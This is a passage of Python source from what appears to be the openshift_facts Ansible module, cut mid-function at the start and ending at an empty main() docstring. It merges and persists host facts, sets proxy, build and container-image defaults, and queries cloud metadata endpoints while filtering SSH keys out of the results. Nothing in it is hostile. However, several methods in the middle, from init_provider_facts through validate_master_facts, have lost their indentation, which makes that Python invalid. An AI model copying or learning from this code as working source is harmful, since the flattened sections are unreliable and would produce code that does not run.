                    facts[key] = copy.deepcopy(new[key])
            # Continue to recurse if old and new fact is a dictionary.
            elif isinstance(value, dict) and isinstance(new[key], dict):
                # Collect the subset of additive facts to overwrite if
                # key matches. These will be passed to the subsequent
                # merge_facts call.
                relevant_additive_facts = []
                for item in additive_facts_to_overwrite:
                    if '.' in item and item.startswith(key + '.'):
                        relevant_additive_facts.append(item)

                # Collect the subset of protected facts to overwrite
                # if key matches. These will be passed to the
                # subsequent merge_facts call.
                relevant_protected_facts = []
                for item in protected_facts_to_overwrite:
                    if '.' in item and item.startswith(key + '.'):
                        relevant_protected_facts.append(item)
                facts[key] = merge_facts(value, new[key], relevant_additive_facts, relevant_protected_facts)
            # Key matches an additive fact and we are not overwriting
            # it so we will append the new value to the existing value.
            elif key in additive_facts and key not in [x.split('.')[-1] for x in additive_facts_to_overwrite]:
                if isinstance(value, list) and isinstance(new[key], list):
                    # Union of both lists, preserving order of first
                    # occurrence and dropping duplicates.
                    new_fact = []
                    for item in copy.deepcopy(value) + copy.deepcopy(new[key]):
                        if item not in new_fact:
                            new_fact.append(item)
                    facts[key] = new_fact
            # Key matches a protected fact and we are not overwriting
            # it so we will determine if it is okay to change this
            # fact.
            elif key in protected_facts and key not in [x.split('.')[-1] for x in protected_facts_to_overwrite]:
                # ha (bool) can not change unless it has been passed
                # as a protected fact to overwrite.
                if key == 'ha':
                    if safe_get_bool(value) != safe_get_bool(new[key]):
                        # pylint: disable=line-too-long
                        module.fail_json(msg='openshift_facts received a different value for openshift.master.ha')  # noqa: F405
                    else:
                        facts[key] = value
            # No other condition has been met. Overwrite the old fact
            # with the new value.
            else:
                facts[key] = copy.deepcopy(new[key])
        # Key isn't in new so add it to facts to keep it.
        else:
            facts[key] = copy.deepcopy(value)
    new_keys = set(new.keys()) - set(orig.keys())
    for key in new_keys:
        # Watchout for JSON facts that sometimes load as strings.
        # (can happen if the JSON contains a boolean)
        if key in inventory_json_facts and isinstance(new[key], string_types):
            facts[key] = yaml.safe_load(new[key])
        else:
            facts[key] = copy.deepcopy(new[key])
    return facts
def save_local_facts(filename, facts):
    """ Save local facts to disk as JSON.

        Args:
            filename (str): local facts file
            facts (dict): facts to set
        Raises:
            OpenShiftFactsFileWriteError: when the directory or file cannot
                be created/written
    """
    try:
        fact_dir = os.path.dirname(filename)
        try:
            os.makedirs(fact_dir)  # try to make the directory
        except OSError as exception:
            if exception.errno != errno.EEXIST:  # but it is okay if it is already there
                raise  # pass any other exceptions up the chain
        with open(filename, 'w') as fact_file:
            fact_file.write(module.jsonify(facts))  # noqa: F405
        # Restrict permissions to the owner: the facts file may contain
        # sensitive values.
        os.chmod(filename, 0o600)
    except (IOError, OSError) as ex:
        raise OpenShiftFactsFileWriteError(
            "Could not create fact file: %s, error: %s" % (filename, ex)
        )
def get_local_facts_from_file(filename):
    """ Retrieve local facts from fact file

        Handles both the legacy INI-style facts file and the current JSON
        format.

        Args:
            filename (str): local facts file
        Returns:
            dict: the retrieved facts (empty when the file is missing or
                unparseable)
    """
    local_facts = dict()
    try:
        # Handle conversion of INI style facts file to json style.
        # ConfigParser replaces SafeConfigParser, which was deprecated and
        # then removed in Python 3.12 (same behavior).
        ini_facts = configparser.ConfigParser()
        ini_facts.read(filename)
        for section in ini_facts.sections():
            local_facts[section] = dict()
            for key, value in ini_facts.items(section):
                local_facts[section][key] = value
    except (configparser.MissingSectionHeaderError,
            configparser.ParsingError):
        # Not INI — assume the current JSON format; swallow errors so a
        # missing/corrupt file simply yields empty facts.
        try:
            with open(filename, 'r') as facts_file:
                local_facts = json.load(facts_file)
        except (ValueError, IOError):
            pass
    return local_facts
def sort_unique(alist):
    """ Sorts and de-dupes a list

        Args:
            alist (list): a list
        Returns:
            list: a sorted de-duped list
    """
    # set() drops duplicates; sorted() yields a new ascending list.
    return sorted(set(alist))
def safe_get_bool(fact):
    """ Get a boolean fact safely.

        Args:
            fact: fact to convert (any type; it is stringified first)
        Returns:
            bool: given fact as a bool
        Raises:
            ValueError: when the fact is not a recognized truth value
    """
    # Inline the truth table of distutils.util.strtobool: distutils was
    # removed in Python 3.12, so we no longer depend on it.  The accepted
    # values and the error message match strtobool's behavior.
    value = str(fact).lower()
    if value in ('y', 'yes', 't', 'true', 'on', '1'):
        return True
    if value in ('n', 'no', 'f', 'false', 'off', '0'):
        return False
    raise ValueError("invalid truth value %r" % (value,))
def set_proxy_facts(facts):
    """ Set global proxy facts

        Args:
            facts(dict): existing facts
        Returns:
            facts(dict): Updated facts with missing values
    """
    if 'common' not in facts:
        return facts

    common = facts['common']
    if 'http_proxy' in common or 'https_proxy' in common or 'no_proxy' in common:
        # Normalize no_proxy into a list while the entries are collected.
        if isinstance(common.get('no_proxy'), string_types):
            common['no_proxy'] = common['no_proxy'].split(",")
        elif 'no_proxy' not in common:
            common['no_proxy'] = []

        # See https://bugzilla.redhat.com/show_bug.cgi?id=1466783
        # masters behind a proxy need to connect to etcd via IP
        if 'no_proxy_etcd_host_ips' in common:
            if isinstance(common['no_proxy_etcd_host_ips'], string_types):
                common['no_proxy'].extend(common['no_proxy_etcd_host_ips'].split(','))

        if 'generate_no_proxy_hosts' in common and safe_get_bool(common['generate_no_proxy_hosts']):
            if 'no_proxy_internal_hostnames' in common:
                common['no_proxy'].extend(common['no_proxy_internal_hostnames'].split(','))

        # We always add local dns domain and ourselves no matter what
        common['no_proxy'].append('.' + common['dns_domain'])
        common['no_proxy'].append('.svc')
        common['no_proxy'].append(common['hostname'])
        # Collapse back to the sorted, de-duped comma-separated form.
        common['no_proxy'] = ','.join(sort_unique(common['no_proxy']))

    facts['common'] = common
    return facts
def set_builddefaults_facts(facts):
    """ Set build defaults including setting proxy values from http_proxy, https_proxy,
        no_proxy to the more specific builddefaults and builddefaults_git vars.
           1. http_proxy, https_proxy, no_proxy
           2. builddefaults_*
           3. builddefaults_git_*

        Args:
            facts(dict): existing facts
        Returns:
            facts(dict): Updated facts with missing values
    """
    if 'builddefaults' in facts:
        builddefaults = facts['builddefaults']
        common = facts['common']

        # Inherit generic proxy settings from common ...
        for proxy_key in ('http_proxy', 'https_proxy', 'no_proxy'):
            if proxy_key not in builddefaults and proxy_key in common:
                builddefaults[proxy_key] = common[proxy_key]

        # ... then derive the git-specific values from the generic
        # builddefaults values when they aren't set explicitly.
        for proxy_key in ('http_proxy', 'https_proxy', 'no_proxy'):
            git_key = 'git_' + proxy_key
            if git_key not in builddefaults and proxy_key in builddefaults:
                builddefaults[git_key] = builddefaults[proxy_key]

        # If we're actually defining a builddefaults config then create
        # admission_plugin_config and merge builddefaults[config] into it.
        # 'config' is the 'openshift_builddefaults_json' inventory variable.
        if 'config' in builddefaults:
            if 'admission_plugin_config' not in facts['master']:
                # Scaffold out the full expected datastructure
                facts['master']['admission_plugin_config'] = {'BuildDefaults': {'configuration': {'env': {}}}}
            facts['master']['admission_plugin_config'].update(builddefaults['config'])
            delete_empty_keys(facts['master']['admission_plugin_config']['BuildDefaults']['configuration']['env'])

    return facts
def delete_empty_keys(keylist):
    """ Delete dictionary elements from keylist where "value" is empty.

        Args:
          keylist(list): A list of builddefault configuration envs.

        Returns:
          none

        Example:
          keylist = [{'name': 'HTTP_PROXY', 'value': 'http://file.rdu.redhat.com:3128'},
                     {'name': 'HTTPS_PROXY', 'value': 'http://file.rdu.redhat.com:3128'},
                     {'name': 'NO_PROXY', 'value': ''}]

          After calling delete_empty_keys the provided list is modified to become:

          [{'name': 'HTTP_PROXY', 'value': 'http://file.rdu.redhat.com:3128'},
           {'name': 'HTTPS_PROXY', 'value': 'http://file.rdu.redhat.com:3128'}]
    """
    # Slice-assign so the caller's list object is mutated in place, keeping
    # only entries whose value is non-empty.
    keylist[:] = [entry for entry in keylist if len(entry['value']) != 0]
def set_buildoverrides_facts(facts):
    """ Set build overrides

        Args:
            facts(dict): existing facts
        Returns:
            facts(dict): Updated facts with missing values
    """
    if 'buildoverrides' in facts:
        buildoverrides = facts['buildoverrides']
        # If we're actually defining a buildoverrides config then create
        # admission_plugin_config and merge buildoverrides[config] into it.
        if 'config' in buildoverrides:
            master = facts['master']
            if 'admission_plugin_config' not in master:
                master['admission_plugin_config'] = dict()
            master['admission_plugin_config'].update(buildoverrides['config'])

    return facts
# pylint: disable=too-many-statements
def set_container_facts_if_unset(facts):
    """ Set containerized facts.

        Args:
            facts (dict): existing facts
        Returns:
            dict: the facts dict updated with the generated containerization
            facts
    """
    # Image names differ between the enterprise and origin distributions
    # only in their registry namespace and base name; etcd comes from the
    # RHEL registry in both cases.
    if facts['common']['deployment_type'] == 'openshift-enterprise':
        repo, base = 'openshift3', 'ose'
    else:
        repo, base = 'openshift', 'origin'
    master_image = '{0}/{1}'.format(repo, base)
    cli_image = master_image
    node_image = '{0}/node'.format(repo)
    ovs_image = '{0}/openvswitch'.format(repo)
    etcd_image = 'registry.access.redhat.com/rhel7/etcd'
    pod_image = '{0}/{1}-pod'.format(repo, base)
    router_image = '{0}/{1}-haproxy-router'.format(repo, base)
    registry_image = '{0}/{1}-docker-registry'.format(repo, base)
    deployer_image = '{0}/{1}-deployer'.format(repo, base)

    facts['common']['is_atomic'] = os.path.isfile('/run/ostree-booted')

    # If openshift_docker_use_system_container is set and is True, run
    # docker through the container-engine service instead.
    if facts['docker'].get('use_system_container'):
        facts['docker']['service_name'] = 'container-engine'

    facts['common'].setdefault('is_containerized', facts['common']['is_atomic'])
    for fact_key, image in (('cli_image', cli_image),
                            ('pod_image', pod_image),
                            ('router_image', router_image),
                            ('registry_image', registry_image),
                            ('deployer_image', deployer_image)):
        facts['common'].setdefault(fact_key, image)

    if 'etcd' in facts:
        facts['etcd'].setdefault('etcd_image', etcd_image)
    if 'master' in facts and 'master_image' not in facts['master']:
        facts['master']['master_image'] = master_image
        facts['master']['master_system_image'] = master_image
    if 'node' in facts:
        if 'node_image' not in facts['node']:
            facts['node']['node_image'] = node_image
            facts['node']['node_system_image'] = node_image
        if 'ovs_image' not in facts['node']:
            facts['node']['ovs_image'] = ovs_image
            facts['node']['ovs_system_image'] = ovs_image

    # Containerized hosts get the client binaries from /usr/local/bin.
    if safe_get_bool(facts['common']['is_containerized']):
        facts['common']['admin_binary'] = '/usr/local/bin/oadm'
        facts['common']['client_binary'] = '/usr/local/bin/oc'

    return facts
def set_installed_variant_rpm_facts(facts):
    """ Set RPM facts of installed variant

        Args:
            facts (dict): existing facts
        Returns:
            dict: the facts dict updated with installed_variant_rpms
    """
    installed_rpms = []
    suffixes = ('master', 'node', 'clients', 'sdn-ovs')
    for base_rpm in ('openshift', 'atomic-openshift', 'origin'):
        # Candidate package names for this variant: the base package, its
        # sub-packages, and the matching tuned profile.
        candidates = [base_rpm]
        candidates.extend('{0}-{1}'.format(base_rpm, suffix) for suffix in suffixes)
        candidates.append('tuned-profiles-%s-node' % base_rpm)
        for rpm in candidates:
            exit_code, _, _ = module.run_command(['rpm', '-q', rpm])  # noqa: F405
            if exit_code == 0:
                installed_rpms.append(rpm)

    facts['common']['installed_variant_rpms'] = installed_rpms
    return facts
class OpenShiftFactsInternalError(Exception):
    """Raised for unexpected internal errors while generating Origin facts."""
    pass
class OpenShiftFactsUnsupportedRoleError(Exception):
    """Raised when a role outside OpenShiftFacts.known_roles is requested."""
    pass
class OpenShiftFactsFileWriteError(Exception):
    """Raised when the local facts file cannot be written."""
    pass
class OpenShiftFactsMetadataUnavailableError(Exception):
    """Raised when a cloud provider metadata endpoint is unreachable."""
    pass
class OpenShiftFacts(object):
    """ Origin Facts

        Attributes:
            facts (dict): facts for the host

        Args:
            module (AnsibleModule): an AnsibleModule object
            role (str): role for setting local facts
            filename (str): local facts file to use
            local_facts (dict): local facts to set
            additive_facts_to_overwrite (list): additive facts to overwrite in jinja
                                                '.' notation ex: ['master.named_certificates']
            protected_facts_to_overwrite (list): protected facts to overwrite in jinja
                                                 '.' notation ex: ['master.master_count']

        Raises:
            OpenShiftFactsUnsupportedRoleError: when the requested role is not
                one of known_roles
    """
    # Top-level fact namespaces (roles) this module knows how to manage;
    # __init__ rejects any other role.
    known_roles = ['builddefaults',
                   'buildoverrides',
                   'cloudprovider',
                   'common',
                   'docker',
                   'etcd',
                   'hosted',
                   'master',
                   'node',
                   'logging',
                   'loggingops',
                   'metrics']
# Disabling too-many-arguments, this should be cleaned up as a TODO item.
# pylint: disable=too-many-arguments,no-value-for-parameter
    def __init__(self, role, filename, local_facts,
                 additive_facts_to_overwrite=None,
                 openshift_env=None,
                 openshift_env_structures=None,
                 protected_facts_to_overwrite=None):
        """ Gather system facts, then generate and persist the OpenShift facts.

            Args:
                role (str): role for setting local facts
                filename (str): local facts file to use
                local_facts (dict): local facts to set
                additive_facts_to_overwrite (list): additive facts to overwrite,
                    jinja '.' notation ex: ['master.named_certificates']
                openshift_env (dict): openshift_env facts to apply
                openshift_env_structures (list): key-splitting patterns for
                    openshift_env facts
                protected_facts_to_overwrite (list): protected facts to overwrite,
                    jinja '.' notation ex: ['master.master_count']

            Raises:
                OpenShiftFactsUnsupportedRoleError: if role is not in known_roles
        """
        self.changed = False
        self.filename = filename
        if role not in self.known_roles:
            raise OpenShiftFactsUnsupportedRoleError(
                "Role %s is not supported by this module" % role
            )
        self.role = role

        # Collect system facts and preface each fact with 'ansible_'.
        try:
            # pylint: disable=too-many-function-args,invalid-name
            self.system_facts = ansible_facts(module, ['hardware', 'network', 'virtual', 'facter'])  # noqa: F405
            # Mirror every fact under an 'ansible_'-prefixed key (dashes
            # normalized to underscores) so both spellings are available.
            additional_facts = {}
            for (k, v) in self.system_facts.items():
                additional_facts["ansible_%s" % k.replace('-', '_')] = v
            self.system_facts.update(additional_facts)
        except UnboundLocalError:
            # ansible-2.2,2.3 -- ansible_facts above raises UnboundLocalError
            # on those versions, so fall back to get_all_facts.
            self.system_facts = get_all_facts(module)['ansible_facts']  # noqa: F405

        self.facts = self.generate_facts(local_facts,
                                         additive_facts_to_overwrite,
                                         openshift_env,
                                         openshift_env_structures,
                                         protected_facts_to_overwrite)
    def generate_facts(self,
                       local_facts,
                       additive_facts_to_overwrite,
                       openshift_env,
                       openshift_env_structures,
                       protected_facts_to_overwrite):
        """ Generate facts

            Args:
                local_facts (dict): local_facts for overriding generated defaults
                additive_facts_to_overwrite (list): additive facts to overwrite in jinja
                                                    '.' notation ex: ['master.named_certificates']
                openshift_env (dict): openshift_env facts for overriding generated defaults
                openshift_env_structures (list): key-splitting patterns for openshift_env
                protected_facts_to_overwrite (list): protected facts to overwrite in jinja
                                                     '.' notation ex: ['master.master_count']
            Returns:
                dict: The generated facts
        """
        # Merge/persist the incoming local facts first; they seed everything below.
        local_facts = self.init_local_facts(local_facts,
                                            additive_facts_to_overwrite,
                                            openshift_env,
                                            openshift_env_structures,
                                            protected_facts_to_overwrite)
        roles = local_facts.keys()

        if 'common' in local_facts and 'deployment_type' in local_facts['common']:
            deployment_type = local_facts['common']['deployment_type']
        else:
            deployment_type = 'origin'

        if 'common' in local_facts and 'deployment_subtype' in local_facts['common']:
            deployment_subtype = local_facts['common']['deployment_subtype']
        else:
            deployment_subtype = 'basic'

        defaults = self.get_defaults(roles, deployment_type, deployment_subtype)
        provider_facts = self.init_provider_facts()
        facts = apply_provider_facts(defaults, provider_facts)
        # Local facts win over defaults/provider facts, subject to the
        # additive/protected overwrite lists.
        facts = merge_facts(facts,
                            local_facts,
                            additive_facts_to_overwrite,
                            protected_facts_to_overwrite)
        facts = migrate_oauth_template_facts(facts)
        facts['current_config'] = get_current_config(facts)
        # NOTE(review): several of the helpers below appear to read facts set
        # by earlier ones; preserve this call order.
        facts = set_url_facts_if_unset(facts)
        facts = set_project_cfg_facts_if_unset(facts)
        facts = set_node_schedulability(facts)
        facts = set_selectors(facts)
        facts = set_identity_providers_if_unset(facts)
        facts = set_deployment_facts_if_unset(facts)
        facts = set_sdn_facts_if_unset(facts, self.system_facts)
        facts = set_container_facts_if_unset(facts)
        facts = build_kubelet_args(facts)
        facts = build_controller_args(facts)
        facts = build_api_server_args(facts)
        facts = set_version_facts_if_unset(facts)
        facts = set_dnsmasq_facts_if_unset(facts)
        facts = set_aggregate_facts(facts)
        facts = set_etcd_facts_if_unset(facts)
        facts = set_proxy_facts(facts)
        facts = set_builddefaults_facts(facts)
        facts = set_buildoverrides_facts(facts)
        # RPM variant facts only make sense on non-containerized installs.
        if not safe_get_bool(facts['common']['is_containerized']):
            facts = set_installed_variant_rpm_facts(facts)
        facts = set_nodename(facts)
        return dict(openshift=facts)
    def get_defaults(self, roles, deployment_type, deployment_subtype):
        """ Get default fact values

            Args:
                roles (list): list of roles for this host
                deployment_type (str): deployment type (e.g. 'origin')
                deployment_subtype (str): deployment subtype (e.g. 'basic')

            Returns:
                dict: The generated default facts
        """
        defaults = {}

        ip_addr = self.system_facts['ansible_default_ipv4']['address']
        exit_code, output, _ = module.run_command(['hostname', '-f'])  # noqa: F405
        hostname_f = output.strip() if exit_code == 0 else ''
        hostname_values = [hostname_f, self.system_facts['ansible_nodename'],
                           self.system_facts['ansible_fqdn']]
        # Pick the best candidate hostname, falling back to the default IP.
        hostname = choose_hostname(hostname_values, ip_addr).lower()

        defaults['common'] = dict(ip=ip_addr,
                                  public_ip=ip_addr,
                                  deployment_type=deployment_type,
                                  deployment_subtype=deployment_subtype,
                                  hostname=hostname,
                                  public_hostname=hostname,
                                  portal_net='172.30.0.0/16',
                                  client_binary='oc', admin_binary='oadm',
                                  dns_domain='cluster.local',
                                  debug_level=2,
                                  config_base='/etc/origin')

        if 'master' in roles:
            defaults['master'] = dict(api_use_ssl=True, api_port='8443',
                                      controllers_port='8444',
                                      console_use_ssl=True,
                                      console_path='/console',
                                      console_port='8443', etcd_use_ssl=True,
                                      etcd_hosts='', etcd_port='4001',
                                      portal_net='172.30.0.0/16',
                                      embedded_etcd=True, embedded_kube=True,
                                      embedded_dns=True,
                                      bind_addr='0.0.0.0',
                                      session_max_seconds=3600,
                                      session_name='ssn',
                                      session_secrets_file='',
                                      access_token_max_seconds=86400,
                                      auth_token_max_seconds=500,
                                      oauth_grant_method='auto',
                                      dynamic_provisioning_enabled=True,
                                      max_requests_inflight=500)

        if 'node' in roles:
            defaults['node'] = dict(labels={}, annotations={},
                                    iptables_sync_period='30s',
                                    local_quota_per_fsgroup="",
                                    set_node_ip=False)

        if 'docker' in roles:
            docker = dict(disable_push_dockerhub=False,
                          options='--log-driver=journald')
            # NOTE: This is a workaround for a dnf output racecondition that can occur in
            # some situations. See https://bugzilla.redhat.com/show_bug.cgi?id=918184
            if self.system_facts['ansible_pkg_mgr'] == 'dnf':
                rpm_rebuilddb()

            version_info = get_docker_version_info()
            if version_info is not None:
                docker['api_version'] = version_info['api_version']
                docker['version'] = version_info['version']
                docker['gte_1_10'] = LooseVersion(version_info['version']) >= LooseVersion('1.10')
            hosted_registry_insecure = get_hosted_registry_insecure()
            if hosted_registry_insecure is not None:
                docker['hosted_registry_insecure'] = hosted_registry_insecure
            docker['service_name'] = 'docker'
            defaults['docker'] = docker

        if 'cloudprovider' in roles:
            defaults['cloudprovider'] = dict(kind=None)

        # Default storage layouts for hosted components (etcd, registry,
        # router) plus the logging and metrics stacks.
        if 'hosted' in roles or self.role == 'hosted':
            defaults['hosted'] = dict(
                etcd=dict(
                    storage=dict(
                        kind=None,
                        volume=dict(
                            name='etcd',
                            size='1Gi'
                        ),
                        nfs=dict(
                            directory='/exports',
                            options='*(rw,root_squash)'
                        ),
                        host=None,
                        access=dict(
                            modes=['ReadWriteOnce']
                        ),
                        create_pv=True,
                        create_pvc=False
                    )
                ),
                registry=dict(
                    storage=dict(
                        kind=None,
                        volume=dict(
                            name='registry',
                            size='5Gi'
                        ),
                        nfs=dict(
                            directory='/exports',
                            options='*(rw,root_squash)'),
                        glusterfs=dict(
                            endpoints='glusterfs-registry-endpoints',
                            path='glusterfs-registry-volume',
                            readOnly=False,
                            swap=False,
                            swapcopy=True),
                        host=None,
                        access=dict(
                            modes=['ReadWriteMany']
                        ),
                        create_pv=True,
                        create_pvc=True
                    )
                ),
                router=dict()
            )

            defaults['logging'] = dict(
                storage=dict(
                    kind=None,
                    volume=dict(
                        name='logging-es',
                        size='10Gi'
                    ),
                    nfs=dict(
                        directory='/exports',
                        options='*(rw,root_squash)'
                    ),
                    host=None,
                    access=dict(
                        modes=['ReadWriteOnce']
                    ),
                    create_pv=True,
                    create_pvc=False
                )
            )

            defaults['loggingops'] = dict(
                storage=dict(
                    kind=None,
                    volume=dict(
                        name='logging-es-ops',
                        size='10Gi'
                    ),
                    nfs=dict(
                        directory='/exports',
                        options='*(rw,root_squash)'
                    ),
                    host=None,
                    access=dict(
                        modes=['ReadWriteOnce']
                    ),
                    create_pv=True,
                    create_pvc=False
                )
            )

            defaults['metrics'] = dict(
                deploy=False,
                duration=7,
                resolution='10s',
                storage=dict(
                    kind=None,
                    volume=dict(
                        name='metrics',
                        size='10Gi'
                    ),
                    nfs=dict(
                        directory='/exports',
                        options='*(rw,root_squash)'
                    ),
                    host=None,
                    access=dict(
                        modes=['ReadWriteOnce']
                    ),
                    create_pv=True,
                    create_pvc=False
                )
            )

        return defaults
    def guess_host_provider(self):
        """ Guess the host provider

            Detects gce/aws/openstack from DMI and virtualization facts and,
            when detected, pulls the provider's instance metadata service.

            Returns:
                dict: {'name': provider-or-None, 'metadata': metadata-or-None}
        """
        # TODO: cloud provider facts should probably be submitted upstream
        product_name = self.system_facts['ansible_product_name']
        product_version = self.system_facts['ansible_product_version']
        virt_type = self.system_facts['ansible_virtualization_type']
        virt_role = self.system_facts['ansible_virtualization_role']
        bios_vendor = self.system_facts['ansible_system_vendor']
        provider = None
        metadata = None

        if bios_vendor == 'Google':
            provider = 'gce'
            metadata_url = ('http://metadata.google.internal/'
                            'computeMetadata/v1/?recursive=true')
            headers = {'Metadata-Flavor': 'Google'}
            metadata = get_provider_metadata(metadata_url, True, headers,
                                             True)

            # Filter sshKeys and serviceAccounts from gce metadata
            if metadata:
                metadata['project']['attributes'].pop('sshKeys', None)
                metadata['instance'].pop('serviceAccounts', None)
        elif virt_type == 'xen' and virt_role == 'guest' and re.match(r'.*\.amazon$', product_version):
            provider = 'aws'
            metadata_url = 'http://169.254.169.254/latest/meta-data/'
            metadata = get_provider_metadata(metadata_url)
        elif re.search(r'OpenStack', product_name):
            provider = 'openstack'
            metadata_url = ('http://169.254.169.254/openstack/latest/'
                            'meta_data.json')
            metadata = get_provider_metadata(metadata_url, True, None,
                                             True)
            if metadata:
                # The EC2-compat endpoint supplies the network facts that the
                # native OpenStack metadata lacks.
                ec2_compat_url = 'http://169.254.169.254/latest/meta-data/'
                metadata['ec2_compat'] = get_provider_metadata(
                    ec2_compat_url
                )

                # disable pylint maybe-no-member because overloaded use of
                # the module name causes pylint to not detect that results
                # is an array or hash
                # pylint: disable=maybe-no-member
                # Filter public_keys and random_seed from openstack metadata
                metadata.pop('public_keys', None)
                metadata.pop('random_seed', None)

                # Without the EC2-compat data we cannot normalize network
                # facts, so treat the metadata as unavailable.
                if not metadata['ec2_compat']:
                    metadata = None

        return dict(name=provider, metadata=metadata)
def init_provider_facts(self):
""" Initialize the provider facts
Returns:
dict: The normalized provider facts
"""
provider_info = self.guess_host_provider()
provider_facts = normalize_provider_facts(
provider_info.get('name'),
provider_info.get('metadata')
)
return provider_facts
@staticmethod
def split_openshift_env_fact_keys(openshift_env_fact, openshift_env_structures):
""" Split openshift_env facts based on openshift_env structures.
Args:
openshift_env_fact (string): the openshift_env fact to split
ex: 'openshift_cloudprovider_openstack_auth_url'
openshift_env_structures (list): a list of structures to determine fact keys
ex: ['openshift.cloudprovider.openstack.*']
Returns:
list: a list of keys that represent the fact
ex: ['openshift', 'cloudprovider', 'openstack', 'auth_url']
"""
# By default, we'll split an openshift_env fact by underscores.
fact_keys = openshift_env_fact.split('_')
# Determine if any of the provided variable structures match the fact.
matching_structure = None
if openshift_env_structures is not None:
for structure in openshift_env_structures:
if re.match(structure, openshift_env_fact):
matching_structure = structure
# Fact didn't match any variable structures so return the default fact keys.
if matching_structure is None:
return fact_keys
final_keys = []
structure_keys = matching_structure.split('.')
for structure_key in structure_keys:
# Matched current key. Add to final keys.
if structure_key == fact_keys[structure_keys.index(structure_key)]:
final_keys.append(structure_key)
# Wildcard means we will be taking everything from here to the end of the fact.
elif structure_key == '*':
final_keys.append('_'.join(fact_keys[structure_keys.index(structure_key):]))
# Shouldn't have gotten here, return the fact keys.
else:
return fact_keys
return final_keys
# Disabling too-many-branches and too-many-locals.
# This should be cleaned up as a TODO item.
# pylint: disable=too-many-branches, too-many-locals
    def init_local_facts(self, facts=None,
                         additive_facts_to_overwrite=None,
                         openshift_env=None,
                         openshift_env_structures=None,
                         protected_facts_to_overwrite=None):
        """ Initialize the local facts

            Args:
                facts (dict): local facts to set
                additive_facts_to_overwrite (list): additive facts to overwrite in jinja
                                                    '.' notation ex: ['master.named_certificates']
                openshift_env (dict): openshift env facts to set
                openshift_env_structures (list): patterns used to split openshift_env keys
                protected_facts_to_overwrite (list): protected facts to overwrite in jinja
                                                     '.' notation ex: ['master.master_count']

            Returns:
                dict: The result of merging the provided facts with existing
                      local facts
        """
        changed = False

        facts_to_set = dict()

        if facts is not None:
            facts_to_set[self.role] = facts

        if openshift_env != {} and openshift_env is not None:
            for fact, value in iteritems(openshift_env):
                # Expand each flat 'openshift_a_b_c' variable into the nested
                # dict {'a': {'b': {'c': value}}}, dropping the leading
                # 'openshift' key and skipping facts for other roles.
                oo_env_facts = dict()
                current_level = oo_env_facts
                keys = self.split_openshift_env_fact_keys(fact, openshift_env_structures)[1:]

                if len(keys) > 0 and keys[0] != self.role:
                    continue

                for key in keys:
                    if key == keys[-1]:
                        current_level[key] = value
                    elif key not in current_level:
                        current_level[key] = dict()
                        current_level = current_level[key]

                facts_to_set = merge_facts(orig=facts_to_set,
                                           new=oo_env_facts,
                                           additive_facts_to_overwrite=[],
                                           protected_facts_to_overwrite=[])

        local_facts = get_local_facts_from_file(self.filename)

        migrated_facts = migrate_local_facts(local_facts)

        new_local_facts = merge_facts(migrated_facts,
                                      facts_to_set,
                                      additive_facts_to_overwrite,
                                      protected_facts_to_overwrite)

        if 'docker' in new_local_facts:
            # remove duplicate and empty strings from registry lists, preserving order
            for cat in ['additional', 'blocked', 'insecure']:
                key = '{0}_registries'.format(cat)
                if key in new_local_facts['docker']:
                    val = new_local_facts['docker'][key]
                    if isinstance(val, string_types):
                        val = [x.strip() for x in val.split(',')]
                    seen = set()
                    new_local_facts['docker'][key] = list()
                    for registry in val:
                        if registry not in seen and registry != '':
                            seen.add(registry)
                            new_local_facts['docker'][key].append(registry)

            # Convert legacy log_options comma sep string to a list if present:
            if 'log_options' in new_local_facts['docker'] and \
                    isinstance(new_local_facts['docker']['log_options'], string_types):
                new_local_facts['docker']['log_options'] = new_local_facts['docker']['log_options'].split(',')

        new_local_facts = self.remove_empty_facts(new_local_facts)

        # Only validate/persist when something actually changed.
        if new_local_facts != local_facts:
            self.validate_local_facts(new_local_facts)
            changed = True
            if not module.check_mode:  # noqa: F405
                save_local_facts(self.filename, new_local_facts)

        self.changed = changed
        return new_local_facts
def remove_empty_facts(self, facts=None):
""" Remove empty facts
Args:
facts (dict): facts to clean
"""
facts_to_remove = []
for fact, value in iteritems(facts):
if isinstance(facts[fact], dict):
facts[fact] = self.remove_empty_facts(facts[fact])
else:
if value == "" or value == [""] or value is None:
facts_to_remove.append(fact)
for fact in facts_to_remove:
del facts[fact]
return facts
def validate_local_facts(self, facts=None):
""" Validate local facts
Args:
facts (dict): local facts to validate
"""
invalid_facts = dict()
invalid_facts = self.validate_master_facts(facts, invalid_facts)
if invalid_facts:
msg = 'Invalid facts detected:\n'
# pylint: disable=consider-iterating-dictionary
for key in invalid_facts.keys():
msg += '{0}: {1}\n'.format(key, invalid_facts[key])
module.fail_json(msg=msg, changed=self.changed) # noqa: F405
# disabling pylint errors for line-too-long since we're dealing
# with best effort reduction of error messages here.
# disabling errors for too-many-branches since we require checking
# many conditions.
# pylint: disable=line-too-long, too-many-branches
@staticmethod
def validate_master_facts(facts, invalid_facts):
""" Validate master facts
Args:
facts (dict): local facts to validate
invalid_facts (dict): collected invalid_facts
Returns:
dict: Invalid facts
"""
if 'master' in facts:
# openshift.master.session_auth_secrets
if 'session_auth_secrets' in facts['master']:
session_auth_secrets = facts['master']['session_auth_secrets']
if not issubclass(type(session_auth_secrets), list):
invalid_facts['session_auth_secrets'] = 'Expects session_auth_secrets is a list.'
elif 'session_encryption_secrets' not in facts['master']:
invalid_facts['session_auth_secrets'] = ('openshift_master_session_encryption secrets must be set '
'if openshift_master_session_auth_secrets is provided.')
elif len(session_auth_secrets) != len(facts['master']['session_encryption_secrets']):
invalid_facts['session_auth_secrets'] = ('openshift_master_session_auth_secrets and '
'openshift_master_session_encryption_secrets must be '
'equal length.')
else:
for secret in session_auth_secrets:
if len(secret) < 32:
invalid_facts['session_auth_secrets'] = ('Invalid secret in session_auth_secrets. '
'Secrets must be at least 32 characters in length.')
# openshift.master.session_encryption_secrets
if 'session_encryption_secrets' in facts['master']:
session_encryption_secrets = facts['master']['session_encryption_secrets']
if not issubclass(type(session_encryption_secrets), list):
invalid_facts['session_encryption_secrets'] = 'Expects session_encryption_secrets is a list.'
elif 'session_auth_secrets' not in facts['master']:
invalid_facts['session_encryption_secrets'] = ('openshift_master_session_auth_secrets must be '
'set if openshift_master_session_encryption_secrets '
'is provided.')
else:
for secret in session_encryption_secrets:
if len(secret) not in [16, 24, 32]:
invalid_facts['session_encryption_secrets'] = ('Invalid secret in session_encryption_secrets. '
'Secrets must be 16, 24, or 32 characters in length.')
return invalid_facts
def main():
    """ Entry point: build the AnsibleModule, generate/persist OpenShift
        facts, and return them via exit_json. """
